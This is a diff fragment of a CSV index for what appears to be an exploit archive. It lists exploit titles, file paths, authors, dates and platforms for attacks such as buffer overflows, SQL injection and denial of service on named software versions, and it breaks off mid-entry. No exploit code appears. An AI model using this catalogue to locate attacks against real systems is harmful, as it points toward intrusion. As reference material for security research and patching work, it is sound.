-19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"Wordpress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 -19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 -19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 -19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 -19406,platforms/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 -19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 +29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service Vulnerability",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"sielco sistemi winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 -19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0,FreeBSD 3.2,NetBSD 1.4 x86,OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 -19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry Vulnerability",1999-02-22,Chris,windows,local,0 -19413,platforms/windows/dos/19413.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1)",1999-07-03,Coolio,windows,dos,0 -19414,platforms/windows/dos/19414.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 -19415,platforms/windows/dos/19415.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 +19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 +19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability",1999-07-06,"Arne Vidstrom",windows,dos,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX <= 4.3.1 adb Vulnerability",1999-07-12,"GZ Apple",aix,local,0 19419,platforms/linux/local/19419.c,"Linux kernel 2.0.37 Segment Limit Vulnerability",1999-07-13,Solar,linux,local,0 -19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 -19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0 +19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 +19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0 19422,platforms/linux/local/19422.txt,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0 -19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0,FreeBSD <= 3.2,Linux kernel <= 2.3,NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 -19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 -19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 -19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0,SGI IRIX <= 6.5.4,SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 +19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 +19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 +19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 +19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 Vulnerability",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5 Vulnerabilities",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID Vulnerability",1999-05-02,Mudge,linux,local,0 -19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a,HP-UX 10.0/11.0,SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 +19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability",2012-06-28,dun,php,webapps,0 19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,metasploit,jsp,webapps,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,metasploit,windows,local,0 @@ -16780,29 +16811,29 @@ id,file,description,date,author,platform,type,port 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 Vulnerability",1999-08-05,"Stefan Lauda",hardware,remote,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability",1999-08-08,Narr0w,windows,dos,0 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability",1999-08-08,rpc,multiple,dos,0 -19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4,OpenBSD <= 2.5,Solaris <= 7.0 profil(2) Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0 +19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2) Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 -19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 +19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE_Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local DoS",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 -19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 +19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5_IIS 4.0_Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,remote,0 -19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 -19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 +19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 +19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 -19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 -19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 +19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 +19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 Privilege Escalation Vulnerability",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability",1999-08-25,"Makoto Shiotsuki",windows,local,0 @@ -16810,9 +16841,9 @@ id,file,description,date,author,platform,type,port 19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service Vulnerability",1999-08-31,anonymous,hardware,dos,0 -19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (1)",1999-08-31,Taeho,unix,remote,0 -19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (2)",1999-08-30,c0nd0r,unix,remote,0 -19480,platforms/multiple/local/19480.c,"ISC INN <= 2.2,RedHat Linux <= 6.0 inews Buffer Overflow Vulnerability",1999-09-02,bawd,multiple,local,0 +19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (1)",1999-08-31,Taeho,unix,remote,0 +19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (2)",1999-08-30,c0nd0r,unix,remote,0 +19480,platforms/multiple/local/19480.c,"ISC INN <= 2.2_RedHat Linux <= 6.0 inews Buffer Overflow Vulnerability",1999-09-02,bawd,multiple,local,0 19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 @@ -16820,36 +16851,37 @@ id,file,description,date,author,platform,type,port 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 -19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 +19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0 -19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 +19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5.0_Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 19493,platforms/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability",1999-09-13,"Nobuo Miwa",multiple,remote,0 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 SMTP Buffer Overflow Vulnerability",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 POP Mail Buffer Overflow Vulnerability",1999-09-13,UNYUN,windows,remote,0 -19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f,AIX <= 4.3.2,CDE <= 2.1,IRIX <= 6.5.14,Solaris <= 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 -19498,platforms/multiple/local/19498.sh,"Common Desktop Environment <= 2.1 20,Solaris <= 7.0 dtspcd Vulnerability",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19498,platforms/multiple/local/19498.sh,"Common Desktop Environment <= 2.1 20_Solaris <= 7.0 dtspcd Vulnerability",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 -19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f,AIX <= 4.3.2,CDE <= 2.1,IRIX <= 6.5.14,Solaris <= 7.0,SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 -19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 +19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 +19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/local/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,local,0 -19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3,ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 +19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic Vulnerability",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris <= 2.6 Profiling File Creation Vulnerability",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation Vulnerability",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 -19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 +19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19513,platforms/hardware/remote/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 DoS",1999-09-27,"Bjorn Stickler",hardware,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 +19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 @@ -16866,7 +16898,7 @@ id,file,description,date,author,platform,type,port 19533,platforms/solaris/local/19533.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris <= 7.0 ufsdump Local Buffer Overflow Vulnerability (2)",1998-12-30,"Cheez Whiz",solaris,local,0 19535,platforms/hp-ux/local/19535.pl,"HP-UX <= 10.20 newgrp Vulnerability",1996-12-01,SOD,hp-ux,local,0 -19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability",1996-12-10,"Josh Richards",multiple,dos,0 +19536,platforms/multiple/dos/19536.txt,"Apache <= 1.1 / NCSA httpd <= 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Vulnerability",1996-12-10,"Josh Richards",multiple,dos,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal Vulnerability",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0 @@ -16874,19 +16906,19 @@ id,file,description,date,author,platform,type,port 19541,platforms/novell/remote/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,remote,0 19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 - 'userOsa' symlink Vulnerability",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow Vulnerability",1999-10-08,"Brock Tellier",sco,local,0 -19544,platforms/linux/local/19544.c,"BSD/OS 2.1,FreeBSD <= 2.1.5,NeXTstep 4.x,IRIX <= 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 -19545,platforms/bsd/local/19545.c,"BSD/OS 2.1,FreeBSD <= 2.1.5,NeXTstep 4.x,IRIX <= 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun(2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 -19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 -19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local,0 +19544,platforms/linux/local/19544.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 +19545,platforms/bsd/local/19545.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 +19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0_Larry Wall Perl 5.0 03_RedHat 4.0/4.1_SGI Freeware 1.0/2.0 suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 +19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0_Larry Wall Perl 5.0 03_RedHat 4.0/4.1_SGI Freeware 1.0/2.0 suidperl Overflow (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0 -19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5,AIX <= 4.2,libc <= 5.2.18,RedHat 4,IRIX 6,Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 -19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5,AIX <= 4.2,libc <= 5.2.18,RedHat 4,IRIX 